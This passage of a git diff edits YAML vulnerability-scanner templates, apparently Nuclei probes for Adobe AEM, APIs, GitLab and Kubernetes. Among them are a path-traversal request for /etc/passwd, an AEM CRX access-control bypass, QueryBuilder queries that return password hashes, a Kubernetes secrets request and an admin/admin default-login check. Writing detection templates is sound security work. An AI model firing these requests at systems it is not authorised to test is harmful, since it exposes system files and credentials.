CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-connect-username-exposure.yaml b/poc/adobe/adobe-connect-username-exposure.yaml index 088b39ad5e..e47b4fe88b 100644 --- a/poc/adobe/adobe-connect-username-exposure.yaml +++ b/poc/adobe/adobe-connect-username-exposure.yaml @@ -1,26 +1,26 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - author: dhiyaneshDk - severity: low - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + author: dhiyaneshDk + severity: low + tags: adobe,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/adobe/aem-crx-bypass.yaml b/poc/adobe/aem-crx-bypass.yaml index 6607f936be..a6187d442a 100644 --- a/poc/adobe/aem-crx-bypass.yaml +++ b/poc/adobe/aem-crx-bypass.yaml @@ -1,10 +1,12 @@ id: aem-crx-bypass + info: author: dhiyaneshDK name: AEM CRX Bypass severity: critical reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ tags: aem + requests: - raw: - | @@ -12,11 +14,13 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate + - | GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate + matchers-condition: and matchers: - type: word @@ -26,10 +30,12 @@ requests: - 'downloadName' - 'acHandling' condition: and + - type: word part: header words: - 'application/json' + - type: status status: - 200 diff --git a/poc/adobe/aem-default-get-servlet-139.yaml b/poc/adobe/aem-default-get-servlet-139.yaml index 274b345439..7186c2256f 100644 --- a/poc/adobe/aem-default-get-servlet-139.yaml +++ b/poc/adobe/aem-default-get-servlet-139.yaml @@ -1,26 +1,15 @@ id: aem-default-get-servlet - info: - name: AEM DefaultGetServlet author: DhiyaneshDk + name: AEM DefaultGetServlet severity: low - description: Sensitive information might be exposed via AEM DefaultGetServlet. - reference: - - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java - tags: aem,adobe + reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 + tags: aem + requests: - method: GET path: - - '{{BaseURL}}/etc' - - '{{BaseURL}}/var' - - '{{BaseURL}}/apps' - - '{{BaseURL}}/home' - - '{{BaseURL}}///etc' - - '{{BaseURL}}///var' - - '{{BaseURL}}///apps' - - '{{BaseURL}}///home' - '{{BaseURL}}/.json' - '{{BaseURL}}/.1.json' - '{{BaseURL}}/....4.2.1....json' diff --git a/poc/adobe/aem-detection-146.yaml b/poc/adobe/aem-detection-146.yaml index 421bb35f54..bb3d7e0753 100644 --- a/poc/adobe/aem-detection-146.yaml +++ b/poc/adobe/aem-detection-146.yaml @@ -2,9 +2,8 @@ id: aem-detection info: name: Favicon based AEM Detection - severity: info author: shifacyclewala,hackergautam - tags: aem,favicon,tech + severity: info reference: - https://twitter.com/brsn76945860/status/1171233054951501824 - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a @@ -13,6 +12,7 @@ info: - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv metadata: shodan-query: http.component:"Adobe Experience Manager" + tags: aem,favicon,tech,adobe requests: - method: GET @@ -25,4 +25,4 @@ requests: matchers: - type: dsl dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/poc/adobe/aem-groovyconsole-154.yaml b/poc/adobe/aem-groovyconsole-154.yaml index 7cac692c6b..b37f3f8d94 100644 --- a/poc/adobe/aem-groovyconsole-154.yaml +++ b/poc/adobe/aem-groovyconsole-154.yaml @@ -1,19 +1,22 @@ id: aem-groovyconsole info: - name: AEM Groovy console exposed - author: d3sca + name: AEM Groovy Console Discovery + author: Dheerajmadhukar severity: critical - description: Groovy console is exposed. - tags: aem + description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution. + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 + tags: aem,adobe requests: - method: GET path: - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/groovyconsole.html" + - "{{BaseURL}}/etc/groovyconsole.html" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -26,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/poc/adobe/aem-hash-querybuilder-157.yaml b/poc/adobe/aem-hash-querybuilder-157.yaml index 50ae6efbd4..9547fb1a96 100644 --- a/poc/adobe/aem-hash-querybuilder-157.yaml +++ b/poc/adobe/aem-hash-querybuilder-157.yaml @@ -1,12 +1,11 @@ id: aem-hash-querybuilder - info: - author: DhiyaneshDk name: Query hashed password via QueryBuilder Servlet + author: DhiyaneshDk severity: medium - reference: https://twitter.com/AEMSecurity/status/1372392101829349376 + reference: + - https://twitter.com/AEMSecurity/status/1372392101829349376 tags: aem - requests: - raw: - | @@ -15,15 +14,13 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - '"success":true' - 'rep:password' - condition: and \ No newline at end of file + condition: and diff --git a/poc/adobe/aem-querybuilder-internal-path-read.yaml b/poc/adobe/aem-querybuilder-internal-path-read.yaml index 5e8033b220..f088c74a61 100644 --- a/poc/adobe/aem-querybuilder-internal-path-read.yaml +++ b/poc/adobe/aem-querybuilder-internal-path-read.yaml @@ -1,10 +1,13 @@ id: aem-querybuilder-internal-path-read + info: author: DhiyaneshDk name: AEM QueryBuilder Internal Path Read severity: medium reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 tags: aem + + requests: - method: GET path: @@ -12,13 +15,16 @@ requests: - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' + + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'jcr:path' - 'success' - condition: and + condition: and \ No newline at end of file diff --git a/poc/adobe/aem-querybuilder-json-servlet-187.yaml b/poc/adobe/aem-querybuilder-json-servlet-187.yaml index 18210457c8..48870c0894 100644 --- a/poc/adobe/aem-querybuilder-json-servlet-187.yaml +++ b/poc/adobe/aem-querybuilder-json-servlet-187.yaml @@ -18,11 +18,6 @@ requests: status: - 200 - - type: word - words: - - "application/json" - part: header - - type: word words: - 'success' diff --git a/poc/adobe/aem-userinfo-servlet.yaml b/poc/adobe/aem-userinfo-servlet.yaml index 0fe58a4195..01684b7d96 100644 --- a/poc/adobe/aem-userinfo-servlet.yaml +++ b/poc/adobe/aem-userinfo-servlet.yaml @@ -4,8 +4,8 @@ info: author: DhiyaneshDk name: AEM UserInfo Servlet severity: info - description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. - tags: aem + description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem,bruteforce requests: @@ -19,7 +19,13 @@ requests: - 200 - type: word + part: body words: - - 'userName' - - 'userID' + - '"userID":' + - '"userName":' condition: and + + - type: word + part: header + words: + - 'application/json' diff --git a/poc/apache/default-apache-test-page-6816.yaml b/poc/apache/default-apache-test-page-6816.yaml index d76fd5ac60..ade74d648c 100644 --- a/poc/apache/default-apache-test-page-6816.yaml +++ b/poc/apache/default-apache-test-page-6816.yaml @@ -4,8 +4,8 @@ info: name: Apache HTTP Server Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 + metadata: + shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" tags: tech,apache requests: diff --git a/poc/api/Google-api.yaml b/poc/api/Google-api.yaml index b5b0737aa7..1242ce0367 100644 --- a/poc/api/Google-api.yaml +++ b/poc/api/Google-api.yaml @@ -1,12 +1,15 @@ id: google-api-key-file + info: name: Google API key author: gaurang severity: info tags: token,file,google + file: - extensions: - all + extractors: - type: regex regex: diff --git a/poc/api/alfacgiapi-wordpress-257.yaml b/poc/api/alfacgiapi-wordpress-257.yaml index 271a1c4865..69b0d39f88 100644 --- a/poc/api/alfacgiapi-wordpress-257.yaml +++ b/poc/api/alfacgiapi-wordpress-257.yaml @@ -1,32 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/api/api-abstractapi.yaml b/poc/api/api-abstractapi.yaml index b6eecac2ef..d817d4faeb 100644 --- a/poc/api/api-abstractapi.yaml +++ b/poc/api/api-abstractapi.yaml @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - '"total_count":' - - '"limit":' - - '"offset":' + - '"name_local":' + - '"location":' + - '"date_year":' condition: and diff --git a/poc/api/api-abuseipdb.yaml b/poc/api/api-abuseipdb.yaml index 077084fa93..ca83d86700 100644 --- a/poc/api/api-abuseipdb.yaml +++ b/poc/api/api-abuseipdb.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://docs.abuseipdb.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md tags: token-spray,abuseipdb self-contained: true diff --git a/poc/api/api-bible.yaml b/poc/api/api-bible.yaml index 313d9d6612..9e47277d90 100644 --- a/poc/api/api-bible.yaml +++ b/poc/api/api-bible.yaml @@ -4,9 +4,10 @@ info: name: API.Bible API Test author: daffainfo severity: info + description: Everything you need from the Bible in one discoverable place reference: - https://docs.api.bible - - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md + - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible tags: token-spray,bible self-contained: true diff --git a/poc/api/api-bravenewcoin.yaml b/poc/api/api-bravenewcoin.yaml index 1fa0c10281..ef81f36b71 100644 --- a/poc/api/api-bravenewcoin.yaml +++ b/poc/api/api-bravenewcoin.yaml @@ -4,10 +4,9 @@ info: name: Brave New Coin API Test author: daffainfo severity: info - description: Real-time and historic crypto data from more than 200+ exchanges reference: - https://bravenewcoin.com/developers - - https://github.com/daffainfo/all-about-apikey/tree/main/brave-new-coin + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Brave%20New%20Coin.md tags: token-spray,bravenewcoin self-contained: true diff --git a/poc/api/api-buildkite-402.yaml b/poc/api/api-buildkite-402.yaml index 77e8e1e677..7855f0b53b 100644 --- a/poc/api/api-buildkite-402.yaml +++ b/poc/api/api-buildkite-402.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,buildkite +self-contained: true requests: - method: GET path: @@ -15,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"id":' + - '"graphql_id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/poc/api/api-circleci-405.yaml b/poc/api/api-circleci-405.yaml index 281d22b656..b01e427381 100644 --- a/poc/api/api-circleci-405.yaml +++ b/poc/api/api-circleci-405.yaml @@ -5,14 +5,18 @@ info: author: zzeitlin reference: https://circleci.com/docs/api/v1 severity: info - tags: token-spray,circle,circleci + tags: token-spray,circleci +self-contained: true requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"admin"' + - '"login"' + condition: and diff --git a/poc/api/api-covalent.yaml b/poc/api/api-covalent.yaml index 159aca5e52..9fb44a3d2e 100644 --- a/poc/api/api-covalent.yaml +++ b/poc/api/api-covalent.yaml @@ -4,9 +4,10 @@ info: name: Covalent API Test author: daffainfo severity: info + description: https://github.com/daffainfo/all-about-apikey/tree/main/covalent reference: - https://www.covalenthq.com/docs/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md + - https://github.com/daffainfo/all-about-apikey/tree/main/covalent tags: token-spray,covalent self-contained: true diff --git a/poc/api/api-dropbox-418.yaml b/poc/api/api-dropbox-418.yaml index 29679e2b2f..cc14c60421 100644 --- a/poc/api/api-dropbox-418.yaml +++ b/poc/api/api-dropbox-418.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,dropbox +self-contained: true requests: - method: POST path: @@ -15,6 +16,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"account_id":' + - '"email":' + condition: and diff --git a/poc/api/api-festivo.yaml b/poc/api/api-festivo.yaml index 3911ce2636..30f758bdf2 100644 --- a/poc/api/api-festivo.yaml +++ b/poc/api/api-festivo.yaml @@ -4,10 +4,9 @@ info: name: Festivo API Test author: daffainfo severity: info - description: Fastest and most advanced public holiday and observance service on the market reference: - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays + - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md tags: token-spray,festivo self-contained: true diff --git a/poc/api/api-harvardart.yaml b/poc/api/api-harvardart.yaml index 7b2f15b76f..e9f965433e 100644 --- a/poc/api/api-harvardart.yaml +++ b/poc/api/api-harvardart.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://github.com/harvardartmuseums/api-docs - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Harvard%20Art%20Museums.md tags: token-spray,harvardart self-contained: true diff --git a/poc/api/api-improvmx.yaml b/poc/api/api-improvmx.yaml index 1b6f7e7986..fb6c00f0d9 100644 --- a/poc/api/api-improvmx.yaml +++ b/poc/api/api-improvmx.yaml @@ -4,9 +4,10 @@ info: name: ImprovMX API Test author: daffainfo severity: info + description: API for free email forwarding service reference: - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md + - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx tags: token-spray,improvmx self-contained: true diff --git a/poc/api/api-instatus.yaml b/poc/api/api-instatus.yaml index 40ac71ae96..1175f1b8b3 100644 --- a/poc/api/api-instatus.yaml +++ b/poc/api/api-instatus.yaml @@ -4,9 +4,10 @@ info: name: Instatus API Test author: daffainfo severity: info + description: Post to and update maintenance and incidents on your status page through an HTTP REST API reference: - https://instatus.com/help/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Instatus.md + - https://github.com/daffainfo/all-about-apikey/tree/main/instatus tags: token-spray,instatus self-contained: true diff --git a/poc/api/api-mailchimp-454.yaml b/poc/api/api-mailchimp-454.yaml index 5232ddda97..9d7073e46c 100644 --- a/poc/api/api-mailchimp-454.yaml +++ b/poc/api/api-mailchimp-454.yaml @@ -3,11 +3,10 @@ id: api-mailchimp info: name: Mailchimp API Test author: zzeitlin - severity: info reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration + severity: info tags: token-spray,mailchimp -self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" diff --git a/poc/api/api-malwarebazaar.yaml b/poc/api/api-malwarebazaar.yaml index ce99bd0a43..f261796b92 100644 --- a/poc/api/api-malwarebazaar.yaml +++ b/poc/api/api-malwarebazaar.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md tags: token-spray,malwarebazaar self-contained: true diff --git a/poc/api/api-pastebin.yaml b/poc/api/api-pastebin.yaml index 143f639fb1..ab46ebbc09 100644 --- a/poc/api/api-pastebin.yaml +++ b/poc/api/api-pastebin.yaml @@ -4,9 +4,10 @@ info: name: Pastebin API Test author: daffainfo severity: info + description: Plain Text Storage reference: - https://pastebin.com/doc_api - - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pastebin.md + - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin tags: token-spray,pastebin self-contained: true diff --git a/poc/api/api-pivotaltracker.yaml b/poc/api/api-pivotaltracker.yaml index 1f7e7007e0..c52e04af9a 100644 --- a/poc/api/api-pivotaltracker.yaml +++ b/poc/api/api-pivotaltracker.yaml @@ -7,7 +7,6 @@ info: severity: info tags: token-spray,pivotaltracker -self-contained: true requests: - method: GET path: @@ -21,4 +20,3 @@ requests: negative: true words: - 'invalid_authentication' - - 'unauthenticated' diff --git a/poc/api/api-quip.yaml b/poc/api/api-quip.yaml index 70239345aa..bb21c29c72 100644 --- a/poc/api/api-quip.yaml +++ b/poc/api/api-quip.yaml @@ -4,10 +4,9 @@ info: name: Quip API Test author: daffainfo severity: info - description: File Sharing and Storage for groups reference: - https://quip.com/dev/automation/documentation - - https://github.com/daffainfo/all-about-apikey/tree/main/quip + - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Quip.md tags: token-spray,quip self-contained: true diff --git a/poc/api/api-urlscan.yaml b/poc/api/api-urlscan.yaml index bcb14d8c1c..93d5b196db 100644 --- a/poc/api/api-urlscan.yaml +++ b/poc/api/api-urlscan.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://urlscan.io/docs/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/URLScan.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md tags: token-spray,urlscan self-contained: true diff --git a/poc/api/apisix-default-login-490.yaml b/poc/api/apisix-default-login-490.yaml index c16b0c60b1..d89104b847 100644 --- a/poc/api/apisix-default-login-490.yaml +++ b/poc/api/apisix-default-login-490.yaml @@ -1,13 +1,22 @@ id: apisix-default-login + info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical - tags: apisix,apache,default-login + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + tags: apisix,apache,default-login + requests: - raw: - | @@ -18,20 +27,25 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork payloads: user: - admin pass: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - '"data"' - '"token"' - '"code":0' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/api/arcgis-rest-api.yaml b/poc/api/arcgis-rest-api.yaml index b60cfd2026..897c70d812 100644 --- a/poc/api/arcgis-rest-api.yaml +++ b/poc/api/arcgis-rest-api.yaml @@ -5,14 +5,11 @@ info: author: Podalirius severity: info description: ArcGIS documents were discovered. - tags: api,arcgis,cms reference: - https://enterprise.arcgis.com/en/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + tags: api,arcgis,cms requests: - method: GET diff --git a/poc/api/bems-api-lfi.yaml b/poc/api/bems-api-lfi.yaml index f81f84cfeb..ffddda6590 100644 --- a/poc/api/bems-api-lfi.yaml +++ b/poc/api/bems-api-lfi.yaml @@ -1,20 +1,24 @@ -id: bems-api-lfi -info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 +id: bems-api-lfi + +info: + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + author: gy741 + severity: high + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/api/burp-api-detect.yaml b/poc/api/burp-api-detect.yaml index d1c703aa98..68a7000ee7 100644 --- a/poc/api/burp-api-detect.yaml +++ b/poc/api/burp-api-detect.yaml @@ -4,9 +4,7 @@ info: name: Burp Rest API Server Running author: joanbono severity: info - reference: - - https://portswigger.net/burp/documentation/enterprise/api-reference - tags: burp,tech + reference: https://portswigger.net/burp/documentation/enterprise/api-reference requests: - method: GET diff --git a/poc/api/gitlab-api-user-enum.yaml b/poc/api/gitlab-api-user-enum.yaml index 4edf1734a5..da88f8d2fa 100644 --- a/poc/api/gitlab-api-user-enum.yaml +++ b/poc/api/gitlab-api-user-enum.yaml @@ -1,15 +1,10 @@ id: gitlab-api-user-enum - info: - name: GitLab - User Information Disclosure Via Open API author: Suman_Kar + name: GitLab - User Information Disclosure Via Open API severity: medium - reference: - - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 - metadata: - shodan-query: http.title:"GitLab" + reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 tags: gitlab,enum,misconfig,disclosure - requests: - raw: - | @@ -17,10 +12,8 @@ requests: Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} - payloads: uid: helpers/wordlists/numbers.txt - stop-at-first-match: true matchers-condition: and matchers: @@ -31,12 +24,10 @@ requests: - "username.*" - "id.*" - "name.*" - - type: word part: header words: - "application/json" - - type: status status: - 200 diff --git a/poc/api/google-api-key.yaml b/poc/api/google-api-key.yaml index 1798c569c3..d8a2a240cd 100644 --- a/poc/api/google-api-key.yaml +++ b/poc/api/google-api-key.yaml @@ -1,19 +1,24 @@ -id: google-api-key - -info: - name: Google API Key - author: Swissky - severity: info - tags: exposure,token,google - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/hopfully404" - - extractors: - - type: regex - part: body - regex: - - "AIza[0-9A-Za-z\\-_]{35}" +id: google-api-key + +info: + name: Google API Key + author: Swissky + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" + + extractors: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" diff --git a/poc/api/kube-api-namespaces.yaml b/poc/api/kube-api-namespaces.yaml index 8d0b0d8792..b4e820623c 100644 --- a/poc/api/kube-api-namespaces.yaml +++ b/poc/api/kube-api-namespaces.yaml @@ -1,26 +1,22 @@ id: kube-api-namespaces - info: name: Kube API Namespaces author: sharath severity: info description: Scans for kube namespaces tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '"NamespaceList":' - '"items":' - condition: and \ No newline at end of file + condition: and diff --git a/poc/api/kube-api-secrets.yaml b/poc/api/kube-api-secrets.yaml index cafadcbdf1..e946725992 100644 --- a/poc/api/kube-api-secrets.yaml +++ b/poc/api/kube-api-secrets.yaml @@ -1,19 +1,23 @@ id: kube-api-secrets + info: name: Kube API Secrets author: sharath severity: info description: Scans for kube secrets endpoint tags: tech,k8s,kubernetes,devops,kube + requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/default/secrets" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: diff --git a/poc/api/sendgrid-api-key-10142.yaml b/poc/api/sendgrid-api-key-10142.yaml index cb06fc3ffc..88f920b11b 100644 --- a/poc/api/sendgrid-api-key-10142.yaml +++ b/poc/api/sendgrid-api-key-10142.yaml @@ -1,11 +1,9 @@ id: sendgrid-api-key - info: name: Sendgrid API Key Disclosure author: Ice3man severity: info - tags: exposure,token,sendgrid - + tags: exposure,token requests: - method: GET path: diff --git a/poc/api/strapi-cms-detect.yaml b/poc/api/strapi-cms-detect.yaml index c08945df08..530e120e7e 100644 --- a/poc/api/strapi-cms-detect.yaml +++ b/poc/api/strapi-cms-detect.yaml @@ -1,5 +1,4 @@ id: strapi-cms-detect - info: name: Strapi CMS detect author: cyllective,daffainfo,idealphase @@ -8,12 +7,10 @@ info: reference: - https://github.com/strapi/strapi tags: tech,strapi,cms - requests: - method: GET path: - "{{BaseURL}}/admin/init" - matchers-condition: and matchers: - type: word @@ -23,11 +20,9 @@ requests: - '"uuid"' - '"hasAdmin"' condition: and - - type: status status: - 200 - extractors: - type: regex part: body diff --git a/poc/api/swagger-api-10593.yaml b/poc/api/swagger-api-10593.yaml index 0266733f40..2c4a1de6ba 100644 --- a/poc/api/swagger-api-10593.yaml +++ b/poc/api/swagger-api-10593.yaml @@ -1,12 +1,16 @@ id: swagger-api info: name: Public Swagger API - author: pdteam + author: pdteam,c-sh0 severity: info tags: exposure,api,swagger requests: - method: GET path: + - "{{BaseURL}}/swagger-ui/swagger-ui.js" + - "{{BaseURL}}/swagger/swagger-ui.js" + - "{{BaseURL}}/swagger-ui.js" + - "{{BaseURL}}/swagger/ui/swagger-ui.js" - "{{BaseURL}}/swagger/ui/index" - "{{BaseURL}}/swagger/index.html" - "{{BaseURL}}/swagger-ui.html" @@ -14,6 +18,7 @@ requests: - "{{BaseURL}}/api/swagger-ui.html" - "{{BaseURL}}/api-docs/swagger.json" - "{{BaseURL}}/api-docs/swagger.yaml" + - "{{BaseURL}}/api_docs" - "{{BaseURL}}/swagger.json" - "{{BaseURL}}/swagger.yaml" - "{{BaseURL}}/swagger/v1/swagger.json" @@ -48,6 +53,7 @@ requests: - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" - 